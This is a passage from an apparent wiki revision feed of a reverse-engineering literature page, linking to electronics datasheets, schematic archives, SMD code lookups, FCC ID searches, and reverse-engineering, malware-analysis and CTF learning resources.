::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3269</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3269"/>
		<updated>2026-02-10T19:02:03Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: Not often do I caugh a gammer mistake made by myself. gg&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
